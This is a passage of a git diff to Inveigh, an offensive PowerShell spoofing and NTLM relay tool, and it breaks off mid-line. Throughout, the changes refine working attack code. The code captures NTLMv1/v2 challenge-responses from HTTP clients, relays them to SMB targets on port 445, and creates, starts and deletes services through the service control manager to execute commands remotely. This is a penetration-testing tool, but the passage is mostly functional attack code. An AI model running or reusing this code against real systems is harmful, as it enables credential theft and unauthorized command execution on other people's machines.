0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length) $SMB_split_index_tracker = $SMB_split_index $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2496,7 +2540,7 @@ $SMB_relay_functions_scriptblock = $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index) $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2525,7 +2569,7 @@ $SMB_relay_functions_scriptblock = $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length] $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2548,8 +2592,8 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service created on $Target") > $null $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null $SMB_service_context_handle = $SMB_client_receive[112..131] - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 @@ -2569,7 +2613,7 @@ $SMB_relay_functions_scriptblock = } elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00') { - $inveigh.console_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null $SMB_relay_failed = $true } else @@ -2591,8 +2635,8 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service failed to start on $Target") > $null } - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 @@ -2618,7 +2662,7 @@ $SMB_relay_functions_scriptblock = if($SMB_close_service_handle_stage -eq 1) { $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service deleted on $Target") > $null - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SMB_close_service_handle_stage++ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle } @@ -2629,7 +2673,7 @@ $SMB_relay_functions_scriptblock = $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -2647,8 +2691,8 @@ $SMB_relay_functions_scriptblock = 'CloseRequest' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2663,8 +2707,8 @@ $SMB_relay_functions_scriptblock = 'TreeDisconnect' { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2689,8 +2733,8 @@ $SMB_relay_functions_scriptblock = 'Logoff' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2818,6 +2862,7 @@ $HTTP_scriptblock = $HTTP_running = $true $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint $HTTP_client_close = $true + $process_ID_bytes = Get-ProcessIDArray $relay_step = 0 if($proxy_listener) @@ -2933,7 +2978,7 @@ $HTTP_scriptblock = while($HTTP_stream.DataAvailable) { - $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) > $null } $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) @@ -2964,13 +3009,13 @@ $HTTP_scriptblock = if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null } } @@ -3024,39 +3069,44 @@ $HTTP_scriptblock = if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { - if($attack -eq 'Session') + if($inveigh.target_list -gt 1) { - $target = $null - ForEach($target_entry in $inveigh.target_list) + if($attack -eq 'Session') { + $target = $null - if(!$target) + ForEach($target_entry in $inveigh.target_list) { - - if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + + if(!$target) { - $target = $target_entry - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") + + if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + { + $target = $target_entry + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null + } + } } - } - - if(!$target -and $SessionPriority -eq 'Y') - { - - ForEach($target_entry in $inveigh.target_list) + if(!$target -and $SessionPriority -eq 'Y') { - if(!$target) + ForEach($target_entry in $inveigh.target_list) { - - if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + + if(!$target) { - $target = $target_entry - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") + + if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + { + $target = $target_entry + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null + } + } } @@ -3064,39 +3114,43 @@ $HTTP_scriptblock = } } - - } - else - { - $target = $null - - ForEach($target_entry in $inveigh.target_list) + else { + $target = $null - if(!$target) + ForEach($target_entry in $inveigh.target_list) { - if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry")) + if(!$target) { - $target = $target_entry + + if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry")) + { + $target = $target_entry + } + } } - } + if(!$target) + { + $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)] + } - if(!$target) - { - $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)] + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null } - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") + } + else + { + $target = $inveigh.target_list[0] } if($inveigh.SMB_relay -and $relay_step -eq 0 -and ($target -and $HTTP_source_IP -ne $target)) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") > $null $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient $SMB_relay_socket.Client.ReceiveTimeout = 60000 $SMB_relay_socket.Connect($Target,"445") @@ -3105,13 +3159,13 @@ $HTTP_scriptblock = if(!$SMB_relay_socket.connected) { - $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null $relay_step = 0 } if($relay_step -eq 1) { - $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version + $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version $process_ID_bytes if($SMB_relay_bytes.Length -le 3) { @@ -3155,9 +3209,9 @@ $HTTP_scriptblock = $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes - $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") + $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") > $null $relay_step = 2 } else @@ -3171,11 +3225,11 @@ $HTTP_scriptblock = if(!$target) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target") > $null } elseif($HTTP_source_IP -ne $Target) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target") > $null } $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port @@ -3194,7 +3248,7 @@ $HTTP_scriptblock = if($HTTP_NTLM_domain_length -eq 0) { - $HTTP_NTLM_domain_string = '' + $HTTP_NTLM_domain_string = "" } else { @@ -3204,13 +3258,13 @@ $HTTP_scriptblock = $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes - if($HTTP_NTLM_user_length -gt 0) + if($HTTP_NTLM_user_length -eq 0) { - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_user_string = "" } else { - $HTTP_NTLM_user_string = "" + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes } $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string @@ -3227,21 +3281,21 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) > $null } if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") @@ -3261,26 +3315,26 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { - $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null } if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") { - $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null } } @@ -3306,8 +3360,8 @@ $HTTP_scriptblock = if(($inveigh.session_list | Where-Object {$_.User -eq $HTTP_username_full -and $_.Target -eq $target -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") - $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null + $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes if(!$SMB_relay_failed) { @@ -3318,7 +3372,7 @@ $HTTP_scriptblock = $inveigh.session_table[$inveigh.session_count] = $SMB_session_ID $inveigh.session_message_ID_table[$inveigh.session_count] = 3 $inveigh.session_lock_table[$inveigh.session_count] = 'open' - $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID + $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes $session_object = New-Object PSObject Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString @@ -3347,12 +3401,12 @@ $HTTP_scriptblock = Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s) Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s) $inveigh.session_list += $session_object - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list") > $null $inveigh.session_count++ } else { - SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID + SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes } } @@ -3362,7 +3416,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3370,7 +3424,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3378,7 +3432,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3386,7 +3440,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3506,6 +3560,7 @@ $control_relay_scriptblock = function SigningCheck { + $process_ID_bytes = Get-ProcessIDArray $target_list = $inveigh.target_list ForEach($target_entry in $target_list) @@ -3520,7 +3575,7 @@ $control_relay_scriptblock = } else { - SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true > $null + SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true $process_ID_bytes > $null } } @@ -3535,13 +3590,9 @@ $control_relay_scriptblock = function OutputQueueLoop { - while($inveigh.output_queue.Count -gt 0) + while($inveigh.output_queue.Count -gt 0 -and $inveigh.output_pause) { - - if($inveigh.console_output) - { - $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null - } + $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null if($inveigh.file_output) { @@ -3649,27 +3700,6 @@ $control_relay_scriptblock = while($inveigh.relay_running) { - - while($inveigh.output_queue.Count -gt 0) - { - - if($inveigh.console_output) - { - $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null - } - - if($inveigh.file_output) - { - $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null - } - - if($inveigh.log_output) - { - $inveigh.log.Add($inveigh.output_queue[0]) > $null - } - - $inveigh.output_queue.RemoveAt(0) - } if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay) { @@ -3732,6 +3762,7 @@ $control_relay_scriptblock = } + OutputQueueLoop Start-Sleep -m 5 } @@ -3742,6 +3773,8 @@ $session_refresh_scriptblock = { param ($SessionRefresh) + $process_ID_bytes = Get-ProcessIDArray + while($inveigh.relay_running) { @@ -3762,12 +3795,9 @@ $session_refresh_scriptblock = $SMB2_message_ID = $inveigh.session_message_ID_table[$session] $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_client_receive = New-Object System.Byte[] 1024 - $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$" - $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path) $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - #$packet_SMB2_header["ProcessID"] = $process_ID_bytes - $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x0D,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_data = New-PacketSMB2Echo $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length @@ -3782,7 +3812,7 @@ $session_refresh_scriptblock = } catch { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null } $inveigh.session_lock_table[$Session] = 'open' @@ -3791,12 +3821,12 @@ $session_refresh_scriptblock = } $session++ + Start-Sleep -s 1 } - - + } - Start-Sleep -m 5 + Start-Sleep -s 1 } } @@ -4358,6 +4388,9 @@ Get captured POST requests. .PARAMETER POSTRequestUnique Get unique captured POST request. + +.PARAMETER Session +Get relay session list. #> [CmdletBinding()] diff --git a/Inveigh.ps1 b/Inveigh.ps1 index 0ab78a1..5a8a791 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 @@ -484,13 +484,11 @@ if(!$inveigh) $inveigh.requested_host_list = New-Object System.Collections.ArrayList $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList $inveigh.DNS_list = New-Object System.Collections.ArrayList + $inveigh.session_list = @() $inveigh.session_socket_table = [HashTable]::Synchronized(@{}) $inveigh.session_table = [HashTable]::Synchronized(@{}) $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{}) - $inveigh.session_user_table = [HashTable]::Synchronized(@{}) - $inveigh.session_timestamp_table = [HashTable]::Synchronized(@{}) $inveigh.session_lock_table = [HashTable]::Synchronized(@{}) - $inveigh.session_privilege_table = [HashTable]::Synchronized(@{}) $inveigh.session_count = 0 } @@ -691,6 +689,11 @@ else $inveigh.newline = "" } +if($inveigh.relay_running) +{ + $inveigh.output_pause = $true +} + # Write startup messages $inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null @@ -1342,6 +1345,11 @@ while($inveigh.output_queue.Count -gt 0) } +if($inveigh.relay_running) +{ + $inveigh.output_pause = $false +} + # Begin ScriptBlocks # Shared Basic Functions ScriptBlock @@ -1588,7 +1596,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1624,7 +1632,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or 